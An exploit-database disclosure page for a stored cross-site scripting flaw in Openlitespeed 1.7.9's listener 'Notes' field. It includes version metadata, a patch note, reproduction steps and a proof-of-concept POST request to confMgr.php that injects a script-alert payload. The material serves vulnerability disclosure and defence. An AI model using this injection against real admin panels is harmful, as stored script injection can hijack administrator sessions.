Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting

vendor:

Openlitespeed

by:

cmOs

8.8

CVSS

HIGH

Stored Cross-Site Scripting

CWE

Product Name: Openlitespeed

Affected Version From: 1.7.9

Affected Version To: 1.7.9

Patch Exists: YES

Related CWE: N/A

CPE: a:openlitespeed:openlitespeed:1.7.9

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 20.04

2021

Openlitespeed 1.7.9 – ‘Notes’ Stored Cross-Site Scripting

Openlitespeed 1.7.9 is vulnerable to stored cross-site scripting (XSS) in the 'Notes' parameter. An attacker can inject malicious JavaScript code into the 'Notes' parameter and then trigger the XSS when the administrator clicks on the Default icon. This can be exploited by sending a specially crafted POST request to the 'confMgr.php' script.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of Openlitespeed.

Source

Exploit-DB raw data:

# Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting
# Date: 3/30/2021
# Exploit Author: cmOs
# Vendor Homepage: https://openlitespeed.org/
# Software Link: https://openlitespeed.org/kb/install-from-binary/
# Version: 1.7.9
# Tested on Ubuntu 20.04

Step 1: Log in to the dashboard using the Administrator account
Step 2: Go to Listeners > Summary > Actions (View) > Edit
Step 3: Inject XSS_Payload to "Notes" parameter
Step 4: Graceful Restart
Step 5: Trigger XSS when Administrator click on Default Icon

[POC]

POST /view/confMgr.php HTTP/1.1
Host: 127.0.0.1:7080
Connection: close
Content-Length: 163
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://127.0.0.1:7080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://127.0.0.1:7080/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6;
litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D;
LSPA37FE0C43B84483E0=I%2Fpkx%2FeQg4s%3D

name=Default&ip=ANY&port=8088&reusePort=&secure=0&note=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&a=s&m=sl_Default&p=lg&t=L_GENERAL&r=Default&tk=0.04356800+1617073257